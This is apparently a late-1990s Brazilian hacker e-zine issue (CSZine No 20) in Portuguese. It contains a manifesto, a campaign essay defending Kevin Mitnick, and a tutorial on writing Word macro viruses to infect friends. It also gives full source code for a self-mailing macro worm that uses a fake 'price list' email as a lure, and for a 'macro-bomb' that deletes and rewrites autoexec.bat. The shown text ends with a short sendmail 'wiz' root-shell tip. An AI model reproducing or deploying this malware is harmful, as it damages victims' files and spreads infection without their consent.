                    zZZZZZZZZZZZZZZZZZZZZZZZZ
                                          zZ
                                         zZ
                                        zZ
                                       zZ
                                      zZ
                 CCCCCCCCCCCCCCCC    zZ SSSSSSSSSSSSSSSS
                CCCCCCCCCCCCCCCCC   zZ SSSSSSSSSSSSSSSSS
               CCCCCCCCCCCCCCCCCC  zZ SSSSSSSSSSSSSSSSSS
              CCCCCC        CCCCC zZ SSSSSS        SSSSS
             CCCCCCC             zZ SSSSSSS
            CCCCCCCC            zZ SSSSSSSSSSSSSSSSSSSSS
            CCCCCCCC           zZ  SSSSSSSSSSSSSSSSSSSSS
             CCCCCCC          zZ                SSSSSSS
              CCCCCC        CCCCC  SSSSS        SSSSSS
               CCCCCCCCCCCCCCCCCC  SSSSSSSSSSSSSSSSSS
                CCCCCCCCCCCCCCCCC  SSSSSSSSSSSSSSSSS
                 CCCCCCCCCCCCCCCC  SSSSSSSSSSSSSSSS
                         zZ
                        zZ
                       zZ
                      zZ
                     zZ
                    zZZZZZZZZZZZZZZZZZZZZZZZZine

                        by Cheat Struck
                              No 20

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

		UIN   da   revista : 16623675
		Canal  da  revista : #CSCHANNEL no irc.via-rs.com.br
		E-Mail  da revista : cszine@hotmail.com
                Memoserv da revista: /msg memoserv send Struck <msg>
                                      (Soh no via-rs)
	        Page  da   revista : http://members.xoom.com/cszine

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=

	Introdu챌찾o:
	Ae.. To tri feliz.. tipo, muita gente conhecida por outros zines me
mandou email dizendo que a CSZine ta ficando cada edi챌찾o melhor. Teve uns que
colocaram-a em segundo lugar(junto com a Hack n'Phreak)em rela챌찾o as melhores
zines hacks brasileiras. :)
	Poxa.. Eu n찾o acho que a CSZine tah assim taum bom, a hack and phreak
e' uma das melhores zines que eu jah l챠 aki no Brasil, os kra de lah entendem
mesmo tanto de hack como de phreak e o CeBoLa e' um dos kra que melhor expli-
ca virii daki do Brasil.
	Eu to segurando todas as pontas da zine, por emquanto que apenas eu e
o Simon Phoenix somos editores oficiais dela, emquanto lah no H and P existem
uns 5 krinhas escrevendo.
	O problema principal da CSZine e' o tamanho dela. Estou colocando
tudo em 10 se챌천es, sendo que os assuntos variam bastante. E as vezes tipo..
eu tenho pouca coisa pra colocar no Hack, the Art..mas e' uma das se챌천es que
tem que sair.
	A zine naum aumentara' bruscamente de tamanho, porque ae ia acabar o
assunto e a zine tb. Como aconteceu com o Quebra de Sigilo e Policy.
	Espero que continue agradando a todos.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=--=-=-=-=-=-=-=-=-

	Indice :

Se챌찾o:	Materia:		Assunto:		Autor:		Nota:

1.      Manifesto               Os 4 Cavalheiros        Apocalypse      8,5
2.	Kevin Mitnick		JUSTI횉A J횁!		Fernanda Serpa	10,0
3.	Programa챌찾o		Programando Macro-Virus	Cheat Struck	9,0
4.	VIRII			Fontes de Macro-virus	Cheat Struck	9,5
5.	Bugz			Root via sendmail	Simon Phoenix	10,0
6.	Phreaking		Secretaria Eletronica	Cheat Struck	10,0
7.	Crackerz		Alterando Datas		Cheat Struck	8,5
8.      Invas찾o de privacidade  Invadindo WinNT         Cheat Struck    10,0
9.      Hack, the Art           Truques Hackz           Cheat Struck    10,0
10.     징징징BoNuS!!!             Servi챌os gratis         Cheat Struck    9,0

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$              $$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  1. Manifesto  $$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$              $$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Os Quatro Cavaleiros

        Depois vi o cordeiro  abrir o primeiro  selo e ouvi chamar com voz de
trovao: VEM! Vi aparecer  entao um cavalo  Branco e o seu  cavaleiro tinha um
arco; foi-lhe  dada uma  coroa, ele partiu como vencedor para tornar a vencer
        Quando  abriu o  segundo selo ouvi  clamar: VEM! Partiu  ent횈o  outro
cavaleiro vermelho; e ao  que o montava foi dado tirar a paz da Terra de modo
que os homens se matassem uns aos outros, e foi lhe dada uma grande espada.
        Quando  abriu o  terceiro  selo, ouvi  clamar: VEM! E vi  aparecer um
cavalo preto, e o seu cavaleiro tinha uma  balanca na mao. Ouvi entao uma voz
clamar: Uma medida de trigo  por um  denario, e tres medidas de cevada por um
denario, mas nao danifiques o azeite e o vinho!.
        Quando abriu o quarto selo ouvi uma voz clamar: VEM! E vi aparecer um
cavalo esverdeado e  o seu  cavaleiro  tinha  por  nome MORTE; e a legiao dos
mortos o seguia.
        Foi-lhe  dado  poder  sobre a  quarta parte da Terra, para matar pela
ESPADA, pela FOME, pela PESTE e pelas FERAS.

                                                The Bible

        O fim estah promixo... Trate de rezar...  Espero que Deus tenha tempo
para escutar tuas preces...
                                                     Apocalypse The Clan

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$                  $$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  2. Kevin Mitnick  $$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$                  $$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	JUSTICA J횁! (por Fernanda Serpa)

	Em 06 de agosto de 1996 iniciamos nossa campanha na Internet exigindo
um julgamento e uma sentenca justa para Kevin Mitnick e condicoes carcerarias
saudaveis, haja vista todo o historico de violacoes e maus tratos sofridos
pelo mesmo em situacoes anteriores.

	Durante todo este tempo temos acompanhado de perto a luta deste homem
pela sua liberdade. Tivemos a oportunidade de conhecer sua familia, mae e av처
e partilhar do sofrimento destas pessoas diariamente.

	E partilhar da coragem que move todas as maes e avos do mundo, que
sao privadas da companhia dos seus familiares mais queridos.

	Acompanhamos as primeiras audiencias onde Kevin era levado ao tribu-
nal algemado e acorrentado como um prisioneiro de alta periculosidade nao
sendo-lhe permitido usar trajes civis;

	Acompanhamos a pratica da tortura sutil, de efeito devastador a longo
prazo, onde os maus tratos evidenciam-se na ameaca velada da solitaria, na
falta do banho diario provocador de erupcoes cutaneas, na devolucao de nossas
correspondencias a fim de isolar o prisioneiro , todas promulgadas a fim de
obter o desespero e o cansaco fisico e emocional do prisioneiro;

	Acompanhamos o desespero de sua mae e sua avo que colocaram suas
casas a disposicao da Justica para obter a garantia necessaria para a fianca
e a recusa da mesma;

	Temos acompanhado este processo injusto onde Kevin Mitnick foi eleito
bode expiatorio do Governo Americano sem a minima condicao de justica. Nos
nao sabiamos quando iniciamos nossa campanha, que Kevin Mitnick ja havia sido
julgado e sentenciado por seus algozes,notadamente o promotor David Schindler
que insiste em manipular, de forma arbitraria, as questoes juridicas e legais
pertinentes ao caso, para justificar o "circo" em que se transformou esta
legitima "fogueira de vaidades".

	Acompanhamos o desvendar das contradicoes promovidas pelos agentes da
condicional onde estava em jogo mais uma sentenca absurda para Kevin Mitnick.

	Acompanhamos., outros sim, as humilhacoes e maus tratos que Kevin tem
sofrido ao longo deste processo,onde ate seus pertences pessoais, documentos,
livros, oculos e roupas foram "confiscados"em dezembro ultimo quando o mesmo
foi colocado na solitaria sob alegacoes as mais variadas, indo da hilariante
caca 횪s sardinhas ate a inusitada transformacao de um walk-man num microfone
secreto. Na verdade o que configurou-se aqui foi mesmo o roubo dos pertences
de Kevin onde, supunham eles, encontrariam a linha de defesa estudada por
Mitnick.

	Forjam-se acusacoes e situacoes para condenar de qualquer maneira o
mito Kevin Mitnick e manter o circo armado.

	Acompanhamos as manobras maquiavelicas praticadas pelos algozes de
Kevin Mitnick usando a midia e a falta de informacao da populacao em geral ,
disseminando a ideia de que hackers sao criminosos perigosos e merecem o des-
prezo da populacao.

	Acompanhamos as sentencas injustas que tem sido perpetradas contra
Kevin Mitnick neste julgamento absurdo onde so existem agravantes e onde se
paga duas vezes pelo mesmo erro numa solapacao clara e vergonhosa da Lei.

	Acompanhamos estupefatos o silencio da sociedade americana diante
desta clara afronta`a sua Constituicao.

	E 횪 terrivel perspectiva de que, num futuro proximo, qualquer cidadao
informatizado do planeta seja um serio candidato a ter sua vida devassada e
sua liberdade ameacada por qualquer Governo arbitrario que ai estabelaca sua
relacao de poder.

	A historia tem nos mostrado ao longo do tempo que a autoridade que
nao se baseia na justica degenera em tirania.

	Hackers jamais deixarao de existir conquanto sua 챕tica original , a
busca do conhecimento, seja um dos atributos mais facilmente encontrados na
raca humana. 횋 preciso saber conviver com este fato na sua complexidade e
viabilizar a questao produtivamente , como ja esta sendo feito em alguns
paises europeus, aproveitando este conhecimento e nao extinguindo-o.

	Kevin Mitnick 챕 um hacker sim. Um purista. Mas nao eh um rotulo. 횋 um
ser humano com passado ,um presente, e nele existem pai , mae, familia,amigos
, amores,valores , pessoas e sentimentos..Mas 챕 preciso haver um futuro e
este tera que ser construido por todos nos. Pelos que fazem as leis, pelos
que executam as leis.

	Nao podemos mais incorrer em erros historicos que venham adesencadear
distorcoes e abusos onde o ser humano mais uma vez ira sofrer a ira dos tira-
nos e o descaso dos ignorantes.

	Temos recebido manifestacoes de todas as partes do mundo apoiando
nossa campanha.

	Tivemos a pagina acessada por dezenas de ONGs, universidades, pessoas
das mais diversas nacionalidades .

	Acompanhamos tranquilos a devassa feita pela Pac Bell(Pacific Bell)
na nossa provedora e a devassa de meu e-mail , numa tentativa inutil de inti-
midacao e afronta.

	Temos tido tambem momentos da mais absoluta generosidade onde ate um
emprego on-line para Kevin Mitnick foi oferecido por uma empresa de informa-
tica . Nao era do conhecimento desta empresa o fato de que Kevin Mitnick foi
condenado a ficar por 3 anos longe de qualquer aparelho eletronico, telefone,
etc...tirando-lhe toda e qualquer oportunidade de refazer sua vida e
trabalhar.

	-Declaracao Universal dos Direitos doHomem - Artigo XXIII. 1.
	 Todo homem tem direito ao trabalho, 횪 livre escolha de emprego, a
condicoes justas e favoraveis de trabalho e 횪 protecao contra o desemprego.

	Kevin Mitnick esta sendo condenado aqui duas vezes pelo mesmo erro.
Onde esta o cumprimento da lei justa?

	Na defesa da lei espera-se a aplicabilidade da pena infalivel, nao a
perversa.

	E acompanhando este bizarro quadro que se apresenta acompanhamos
estupefatos e indignados a "proposta indecente" de acordo feita pelo Governo
Americano no comeco do ano, onde Kevin Mitnick, entre outras coisas, teria
que abrir mao pelo resto de sua vida de usufruir qualquer tipo de beneficios
(direitos autorais entre outros) com a sua propria historia.

	Definitivamente isto nao 챕 um julgamento. 횏 uma perseguicao. E uma
vergonha para todos n처s.

	Kevin Mitnick esta doente. Este quadro tem se repetido ao longo do
ano. A desesperanca e o peso da injustica tem sido insuportaveis para Kevin e
sua familia. Kevin Mitnick esta sendo assassinado lentamente por este sistema
devorador que precisa de bodes expiatorios para sobreviver a propria iniqui-
dade.

	Nos choramos com ele e por ele. Mas nao vamos desistir..

-=-=-=-=-=-=-=--=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$                $$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  3. Programa챌찾o  $$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$                $$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Programando Macro-Virus

	Aki eu ensinarei a programar um virus de macro, pois atualmente e'
uma das coisas mais faceis de se fazer.
	A primeira coisa que vc tem que saber e' que os virus de macro estao
no armazenados no arquivo normal.dot no diret처rio /modelos do word. Sendo as-
sim e' impossivel dois virus de macro para word estejam ao mesmo tempo num
mesmo sistema. A n찾o ser que tenha duas vers천es do word instaladas.
	Por챕m, pode acontecer de um virus de macro estar atavando o word e um
outro estar atakando o Exel.
	Eu n찾o considero isso bem um virus. Antes de saber que existiam eu
fazia macros tanto para word quanto exel e access. Ae ent찾o os kra descobri-
ram que dava pra sakanear os outros com essas macros e decidiram dizer que
era virus.
	Tudiu bem. Entao digamos que e' virus. Vc ta afim de passar um para
um amigo seu, mas quer algo original e n찾o akeles exemplos do texto escrito
pelo James Bond(NetHack). Entaum eu vou salvar a patria e ensinar a vcs como
se programa macros e alguns comandos especiais, muito usados nesses virus.
	A primeira coisa que eu notei ao aprender VB e' que a linguagem dos
macros era quase igual a do VB(Visual Basic). Porem a microsoft quando trouxe
o word para o Brasil quiz traduzir tudo, inclusive a linguagem das Macros.
Entaum ficou uma confus찾o soh.

	Eu vou ensinar a fazer os macros com a linguagem utilizada aki no
Brasil. Por isso lembre-se: se o seu amigo(que sera infectado) estiver usando
o word americano, vc tera que adaptar o texto se n찾o o virs nao tera efeito
algum.

	O corpo do macro e' assim:

Sub MAIN
Comandos
End Sub

	Aki estao os comandos mais usados:

	횠횠횠횠횠횠횠횠횠횠횠횠
	횠 ON Error 횠
	횠횠횠횠횠횠횠횠횠횠횠횠
	Este e' muito usado no inicio do arquivo. Assim:

Sub MAIN
On Error Goto fim
fim:
End Sub

	Entaum assim que der algum problema no macro ele parar찼 de ser exe-
cutado. Entre o "On Error..." e o "fim:" deve ser colocado o corpo do virus.

	횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠
	횠 If Variavel 횠
	횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠
	Verifica se a variavel tem o valor determinado. Exemplo:

If Teste = "Ola" then msgbox("Olaaaa!", "Oi", 5)

	횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠
	횠 ObterInfoSistema 횠
	횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠
	Obtem informa챌천es sobre o sistema que esta sendo usado. Exemplo:

versao=ObterInfoSistema(24)		; Consegue a vers찾o do Word
so=ObterInfoSistema(21)			; Consegue a vers찾o do Windows

	횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠
	횠 CopiarArquivo 횠
	횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠
	Copia um arquivo de uma fonte a um destino. Exemplo:

CopiarArquivo "c:\winword\modelos\normal.dot", "c:\"

	횠횠횠횠횠횠횠횠
	횠 Name 횠
	횠횠횠횠횠횠횠횠
	Renomeia um arquivo. Exemplo:

Name "c:\normal.dot", "c:\fuck.sys"

	횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠
	횠 AplSendoExecutada 횠
	횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠
	Verifica se um aplicativo esta sendo executado. Exemplo:

If AplSendoExecutada("Eudora") Then AplExibir("Eudora Light")

	횠횠횠횠횠횠횠횠횠횠횠횠횠
	횠 AplExibir 횠
	횠횠횠횠횠횠횠횠횠횠횠횠횠
	Exibi o aplicativo que esta sendo executado.

	횠횠횠횠횠횠횠횠횠횠횠횠횠횠
	횠 AplOcultar 횠
	횠횠횠횠횠횠횠횠횠횠횠횠횠횠
	Minimiza o aplicativo que esta sendo executado. Exemplo:

AplOcultar "Eudora Light"

	횠횠횠횠횠횠횠횠횠횠횠횠횠
	횠 AplAtivar 횠
	횠횠횠횠횠횠횠횠횠횠횠횠횠
	Ativa um aplicativo que esta sendo executado. Exemplo:

AplAtivar "Eudora Light"

	횠횠횠횠횠횠횠횠횠
	횠 Shell 횠
	횠횠횠횠횠횠횠횠횠
	Executa um programa. Exemplo:

Shell "c:\command.com", 1

	횠횠횠횠횠횠횠횠
	횠 Goto 횠
	횠횠횠횠횠횠횠횠
	Vai para uma label. Exemplo:

inicio:
goto fim:
fim:

	횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠
	횠 EnviarTeclas 횠
	횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠
	Envia teclas para um aplicativo sendo executado. Exemplo:

AplAtivar "WordPad"
EnviarTeclas "Fuck You"

	횠횠횠횠횠횠횠횠횠횠
	횠 MsgBox 횠
	횠횠횠횠횠횠횠횠횠횠
	Abre uma caixa de mensagem no Word. Exemplo:

MsgBox "Mensagem da caixa", "titulo da caixa", 5

	횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠
	횠 ArquivoNovoPadr찾o 횠
	횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠횠
	Insere um novo arquivo padr찾o.

	횠횠횠횠횠횠횠횠횠횠횠
	횠 Inserir 횠
	횠횠횠횠횠횠횠횠횠횠횠
	Insere texto no arquivo aberto pelo word. Exemplo:

Inserir "Fuck yor mother, fuck your syster, fuck your dog, fuck you!!!!"
Inserir "Voce foi infectado pelo Virus Pega-Lamer."
Inserir "hehehehehehe"

	횠횠횠횠횠횠횠횠
	횠 Kill 횠
	횠횠횠횠횠횠횠횠
	Deleta um arquivo. Exemplo:

kill "c:\autoexec.bat"

	횠횠횠횠횠횠횠횠횠
	횠 MkDir 횠
	횠횠횠횠횠횠횠횠횠
	Cria um diret처rio. Exemplo:

MkDir "c:\winword\babaca"

	횠횠횠횠횠횠횠횠횠
	횠 RmDir 횠
	횠횠횠횠횠횠횠횠횠
	Remove um Diret처rio. Exemplo:

RmDir "c:\winword\babaca"

	E 챕 soh isso galera.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$          $$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  4. VIRII  $$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$          $$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Macro-Worm

	Este e' um worm inofensivo. Ele apenas se multiplicar찼 pela rede,
infectando os normal.dot de varios sistemas, porem ele n찾o faz nada de mais.
N찾o possui nenhum codigo fatal como kill "c:\*.*", apenas se multiplicar찼 sem
que o dono do sistema descubra.
	Este worm foi escrito por Billy Joe.

----------------------------Corte Aki--(Normal.dot)--------------------------
Sub MAIN
On Error Goto noway
versao$ = ObterInfoSistema$(24)
so$ = ObterInfoSistema$(21)
normal$ = ""
nome$ = "c:\precos.doc"

If Arquivos$(nome$) <> "" Then Kill nome$
If Arquivos$("c:\winword\modelos\normal.dot") <> "" Then
	normal$ = Arquivos$("c:\winword\modelos\normal.dot")
End If
If Arquivos$("c:\winword\normal.dot") <> "" Then
	normal$ = Arquivos$("c:\winword\normal.dot")
End If
If Arquivos$("c:\msoffice\modelos\normal.dot") <> "" Then
	normal$ = Arquivos$("c:\msoffice\modelos\normal.dot")
End If
If Arquivos$("c:\msoffice\models\normal.dot") <> "" Then
	normal$ = Arquivos$("c:\msoffice\models\normal.dot")
End If
If Arquivos$("normal.dot") <> "" Then normal$ = Arquivos$("normal.dot")
If Arquivos$("modelos\normal.dot") <> "" Then
	normal$ = Arquivos$("modelos\normal.dot")
End If

If normal$ = "" Then Goto NoWay
CopiarArquivo normal$, "c:\"
Name "c:\Normal." As nome$

If AplSendoExecutada("Eudora") Then
 AplExibir "Eudora Light"
 Goto eudora
End If
If AplSendoExecutada("Internet Mail") Then Goto win95
If Arquivos$("C:\eudora\eudora.exe") <> "" Then
 Shell Arquivos$("C:\eudora\eudora.exe"), 1
 Goto eudora
End If
If Arquivos$("C:\arquivos de programas\eudora\eudora.exe") <> "" Then
 Shell Arquivos$("C:\arquivos de programas\eudora\eudora.exe"), 1
 Goto eudora
End If
If Arquivos$("C:\Program Files\eudora\eudora.exe") <> "" Then
 Shell Arquivos$("C:\Program Files\eudora\eudora.exe"), 1
 Goto eudora
End If

If so$ = "Windows" Then Goto Windows
Goto NoWay
Windows:
If (versao$ >= "3") And (versao$ < "4.0") Then Goto Win311
If AplSendoExecutada("Internet Mail") Then Goto Win95
Goto noway
Win311:
If AplSendoExecutada("Mail") Then
AplAtivar "Mail"
Else
MicrosoftMail
EnviarTeclas "{enter 3}", - 1
End If
On Error Goto NoWay
EnviarTeclas "^r", - 1
AplOcultar "Mensagem"
EnviarTeclas "%d", - 1
AplOcultar "Endere챌os"
EnviarTeclas "+^{end}", - 1
EnviarTeclas "%p", - 1
EnviarTeclas "{enter}", - 1
EnviarTeclas "{tab 2}Sente s처:{tab}", - 1
EnviarTeclas " Oi,{enter 2}Estou te enviando uma lista ", - 1
EnviarTeclas "sobre precos de programas para ", - 1
EnviarTeclas "PC, de uma olhada nela, falo ", - 1
EnviarTeclas "com voce mais tarde, eu tenho que ", - 1
EnviarTeclas "ir para a escola, a empregada nao veio ", - 1
EnviarTeclas "e eu tenho que me virar. Tchau.%r", - 1
EnviarTeclas nome$, - 1
EnviarTeclas "{enter}%f%n%j1", - 1
EnviarTeclas "{home}+^{end}{del 2}%{f4}"
EnviarTeclas T = tecla "{tab}{enter}", - 1
Win95:
AplExibir "Internet mail"
AplOcultar "Internet mail"
EnviarTeclas("^n"), - 1
If AplSendoExecutada("Nova Messagem") Then
Goto portugues
Else
If AplSendoExecutada("New Message") Then Goto Ingles
End If
Goto noway
Ingles:
AplOcultar "New message"
EnviarTeclas "%m", - 1
EnviarTeclas "r+^{end}", - 1
EnviarTeclas "%o", - 1
EnviarTeclas "{tab 7}{enter}{tab 2}", - 1
EnviarTeclas "^{home}Sente s처:{tab}", - 1
EnviarTeclas " ^{home}{enter}^{home}Oi,{enter 2}Estou", - 1
EnviarTeclas " te enviando uma lista", - 1
EnviarTeclas " sobre precos de programas e", - 1
EnviarTeclas " jogos para o ", - 1
EnviarTeclas "PC, de uma olhada nela, falo ", - 1
EnviarTeclas "com voce mais tarde, eu tenho que", - 1
EnviarTeclas " ir para a escola, a empregada nao veio ", - 1
EnviarTeclas "e eu tenho que me virar. Tchau.{enter}%if", - 1
AplOcultar "Insert Atta"
EnviarTeclas nome$, - 1
EnviarTeclas "{enter}%s^m", - 1
REM EnviarTeclas "{home}+^{end}{del}%{f4}^m", - 1
AplOcultar "Sending and Receiving"
AplOcultar "Internet Mail"
AplExibir "Microsoft Word"
Goto noway
Portugues:
REM AplAtivar "Internet mail"
AplOcultar "Internet mail"
REM EnviarTeclas("^n"), - 1
AplOcultar "Nova mensagem"
EnviarTeclas "%m", - 1
EnviarTeclas "r+^{end}", - 1
EnviarTeclas "%p", - 1
EnviarTeclas "{tab 7}{enter}{tab 2}", - 1
EnviarTeclas "Sente s처:{tab}", - 1
EnviarTeclas " ^{home}{enter}^{home}Oi,{enter 2}Estou", - 1
EnviarTeclas " te enviando uma lista", - 1
EnviarTeclas " sobre precos de programas e", - 1
EnviarTeclas " jogos para o ", - 1
EnviarTeclas "PC, de uma olhada nela, falo ", - 1
EnviarTeclas "com voce mais tarde, eu tenho que", - 1
EnviarTeclas " ir para a escola, a empregada nao veio ", - 1
EnviarTeclas "e eu tenho que me virar. Tchau.{enter}%ia", - 1
AplOcultar "Insira"
EnviarTeclas nome$, - 1
EnviarTeclas "{enter}%e^m", - 1
REM EnviarTeclas "{home}+^{end}{del}%{f4}^m", - 1
AplOcultar "Interner mail"
AplExibir "Microsoft Word"
Goto noway
eudora:
AplOcultar "Eudora Light"
EnviarTeclas "{esc 2}", - 1
EnviarTeclas "^n^l{home}+^{end}%t", - 1
EnviarTeclas "{tab}Sente s처:{tab 3}", - 1
EnviarTeclas "Oi,{enter 2}Estou te enviando uma lista", - 1
EnviarTeclas " sobre pre챌os de programas e", - 1
EnviarTeclas " jogos para o ", - 1
EnviarTeclas "PC, d챗 uma olhada nela, falo ", - 1
EnviarTeclas "com voce outra hora, eu tenho que", - 1
EnviarTeclas " ir para a escola, a empregada nao veio ", - 1
EnviarTeclas "e eu tive que me virar sozinho. Tchau.{enter}^h", - 1
AplOcultar "Attach"
EnviarTeclas nome$, - 1
EnviarTeclas "{enter}^e^t", - 1
AplOcultar "progress"
AplOcultar "eudora Light"
REM EnviarTeclas "{enter}", - 1
AplExibir "Microsoft Word"
NoWay:
End Sub

-----------------------------------------------------------------------------

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Macro-Bomb

	Este outro foi escrito por mim. O que ele faz 챕 inserir uma bomba no
autoexec.bat do coitado.

---------------------------Corte Aki--(normal.dot)---------------------------
Sub Main
Kill "c:\autoexec.bat"
exec = "c:\notepad.exe c:\autoexec.bat"
shell exec, 1
EnviarTeclas "@echo off"
EnviarTeclas "Echo Hahahahahahahaha"
EnviarTeclas "Echo Voce foi infectado pelo virus Fooker!!!"
EnviarTeclas "Echo Escrito Por Cheat Struck"
EnviarTeclas "Echo."
EnviarTeclas "Echo Red Alert!!!!"
EnviarTeclas "Echo BOOT Reescrito... Trava total do sistema!!!"
EnviarTeclas "Echo heheheheh > c:\exec.exe"
EnviarTeclas "Call c:\exec.exe"
EnviarTeclas "{f10}"
EnviarTeclas "a"
EnviarTeclas "s"
EnviarTeclas "{f10}"
EnviarTeclas "a"
EnviarTeclas "r"
End Sub
-----------------------------------------------------------------------------

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$         $$$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  5. Bugz  $$$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$         $$$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Root Access via sendmail (por Simon Phoenix)

짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩
* Vers천es : Antigas
* Descri챌찾o : Root shell
* Exploit :
Ap처s conectar-se com o host pela porta 25(sendmail) digite "wiz" e vc cair찼
na shell.
E' meio dificio de encontrar este bug atualmente.

